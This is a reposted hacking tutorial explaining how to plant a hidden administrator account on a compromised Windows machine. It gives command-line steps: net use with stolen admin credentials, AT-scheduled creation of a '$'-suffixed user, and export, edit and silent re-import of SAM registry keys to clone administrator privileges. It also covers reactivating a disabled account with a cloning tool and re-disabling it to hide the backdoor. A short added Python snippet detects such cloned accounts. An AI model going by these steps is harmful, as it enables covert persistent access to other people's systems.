How to build a hidden super user from the command line

xiaoxiao 2021-03-05

Here the AT command is used: a scheduled task created by AT runs as SYSTEM, so the psu.exe program is not needed. For AT to work, the broiler (the compromised host) must have the Schedule service running; if it is not, it can be started remotely with the NetSvc.exe or sc.exe tools from the Liuguang toolkit. Any other method works too, as long as the Schedule service ends up started. On the command line you can use various connection methods, such as connecting to MSSQL's port 1433 with SQLEXEC or getting a cmdshell over Telnet, as long as you have permission to run the AT command.

1. First find a broiler; how to do that is not covered here. Assume a broiler has been found whose super user is administrator with the password 12345678; we now create a hidden super user on it remotely from the command line. (The host in the example is on my local network. I changed its IP address to 13.50.97.238 so as not to expose and harass a real Internet address.)

2. Establish a connection with the broiler. The command is: net use \\13.50.97.238\ipc$ "12345678" /user:"administrator"

3. Create a user on the broiler with the AT command (if the Schedule service is not started, start it remotely with NetSvc.exe or sc.exe): at \\13.50.97.238 12:51 c:\winnt\system32\net.exe user hacker$ 1234 /add. The user name ends with $ because net user will then not list this user, although the account manager still shows it.

4. Export HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users with an AT command: at \\13.50.97.238 12:55 c:\winnt\regedit.exe /e hacker.reg HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\ . Here /e is regedit.exe's export switch, and the key path HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\ must end with a backslash. If necessary, put the command in quotation marks: "c:\winnt\regedit.exe /e hacker.reg HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\".

5. Download hacker.reg from the broiler to this machine and open it in Notepad for editing: copy \\13.50.97.238\admin$\system32\hacker.reg c:\hacker.reg. How to modify it was shown in the graphical method and is not repeated here.

6. After editing hacker.reg, copy it back to the broiler: copy c:\hacker.reg \\13.50.97.238\admin$\system32\hacker1.reg

7. Check the broiler's time with net time \\13.50.97.238, then delete the user hacker$ with the AT command: at \\13.50.97.238 13:40 net user hacker$ /del

8. Verify that hacker$ has been deleted: disconnect from the broiler with net use \\13.50.97.238\ipc$ /del, then try net use \\13.50.97.238\ipc$ "1234" /user:"hacker$" to connect to the broiler as hacker$; the connection fails, which shows the account has been deleted.

9. Reconnect to the broiler with net use \\13.50.97.238\ipc$ "12345678" /user:"administrator", get the broiler's time, and use the AT command to import the hacker1.reg copied to the broiler into its registry: at \\13.50.97.238 13:41 c:\winnt\regedit.exe /s hacker1.reg. The /s switch means silent mode.

10. Verify that hacker$ has been created; the method is the same as the one used above to verify that it was deleted.

11. Then verify that the user hacker$ has read, write and delete permissions; if you are still not satisfied, also verify that it can create other accounts.

12. From step 11 it is clear that the user hacker$ now has super user privilege: it was created by the AT command as a normal user, but it now has remote read, write and delete permission.

Third: what if the broiler does not have the 3389 terminal service open and you do not want to use the command line? In that case you can also establish a hidden super user on the broiler through the graphical interface. Because regedit.exe and regedt32.exe can connect to a network registry, you can use regedt32.exe to set permissions on the remote host's registry keys and regedit.exe to edit the remote registry. The account manager can also connect to another computer, so you can use it to create and delete accounts on the remote host. The specific steps are similar to those above and are not repeated here; the only drawback is that it is unbearably slow. There are two prerequisites: 1. First run net use \\broilerIP\ipc$ "password" /user:"superusername" to establish a connection with the remote host; only then can regedit.exe, regedt32.exe and the account manager connect to it. 2. The remote host must have the Remote Registry service running (if it is not, you can start it remotely, since you have a super user password).

Fourth: establishing a hidden super user from a disabled account. We can use a disabled user on the broiler to establish a hidden super user.

The method is as follows: 1. First find out which users are disabled. In general, some administrators disable Guest for security, and of course other users may be disabled as well. In the graphical interface this is very easy: a disabled account shows a red cross. On the command line I have not thought of a good way; I can only run the command net user <username> for each user one by one to see whether that account is disabled. 2. Assume that the user Hacker was disabled by the administrator. First use Xiaoyan's cloning program ca.exe to clone the disabled user Hacker into a super user (after cloning, the user Hacker is automatically activated): ca.exe \\broilerIP administrator <super user password> Hacker <Hacker password>. 3. If you now have a cmdshell, whether through the Telnet service or a shell obtained with SQLEXEC on MSSQL's default port 1433, just enter the command net user Hacker /active:no and the user Hacker is disabled again (at least on the surface). Of course, you can substitute any other disabled user for Hacker.
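An added example, not from the original article, showing how a defender can spot both tricks described above from a regedit export of the Users key: a cloned account's F value still carries the RID it was copied from, and a $-suffixed name is hidden from net user. The .reg text below is constructed; the RID position at offset 0x30 follows the documented F-value layout.

```python
import re
USERS = r"HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users"

def f_value(rid: int) -> str:
    """Minimal SAM 'F' value as regedit hex; the documented layout keeps the RID (LE DWORD) at offset 0x30."""
    raw = bytes(0x30) + rid.to_bytes(4, "little") + bytes(12)
    return "hex:" + ",".join(f"{b:02x}" for b in raw)

# Constructed export: Administrator (key 000001F4) and "hacker$" (key 000003EB),
# whose F value was overwritten with a copy of Administrator's, as in the text above.
SAMPLE_REG = f"""Windows Registry Editor Version 5.00
[{USERS}\\000001F4]
"F"={f_value(0x1F4)}
[{USERS}\\000003EB]
"F"={f_value(0x1F4)}
[{USERS}\\Names\\Administrator]
@=hex(1f4):
[{USERS}\\Names\\hacker$]
@=hex(3eb):
"""

def parse_sam_export(reg_text: str):
    """Return ({key_rid: rid_inside_F}, {name: rid}); Names\\<user> stores the RID as the type of its '@' value."""
    text = reg_text.replace("\\\r\n  ", "").replace("\\\n  ", "")  # rejoin hex lines regedit wrapped with '\'
    f_by_key, rid_by_name, current = {}, {}, None
    for line in text.splitlines():
        if m := re.match(r"\[.*\\Users\\([0-9A-Fa-f]{8})\]$", line):
            current = int(m.group(1), 16)            # inside a user key named by RID
        elif m := re.match(r"\[.*\\Users\\Names\\(.+)\]$", line):
            current = m.group(1)                     # inside a Names\<user> key
        elif (m := re.match(r'"F"=hex:([0-9A-Fa-f,]+)', line)) and isinstance(current, int):
            raw = bytes(int(b, 16) for b in m.group(1).split(","))
            f_by_key[current] = int.from_bytes(raw[0x30:0x34], "little")
        elif (m := re.match(r"@=hex\(([0-9A-Fa-f]+)\):", line)) and isinstance(current, str):
            rid_by_name[current] = int(m.group(1), 16)
    return f_by_key, rid_by_name

def find_suspicious_accounts(reg_text: str):
    """Flag F values carrying a foreign RID (cloned account) and '$'-suffixed names (hidden from net user)."""
    f_by_key, rid_by_name = parse_sam_export(reg_text)
    name_by_rid = {rid: n for n, rid in rid_by_name.items()}
    findings = []
    for key_rid, inner_rid in f_by_key.items():
        name = name_by_rid.get(key_rid, "<no Names entry>")
        if inner_rid != key_rid:
            findings.append((name, key_rid, f"F value holds RID {inner_rid:#x}"))
        if name.endswith("$"):
            findings.append((name, key_rid, "name ends with $"))
    return findings
```

Run against a real regedit /e export of the Users key, the same two checks apply unchanged; a clean system yields an empty list.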

Please credit the original address when reprinting: https://www.9cbs.com/read-37521.html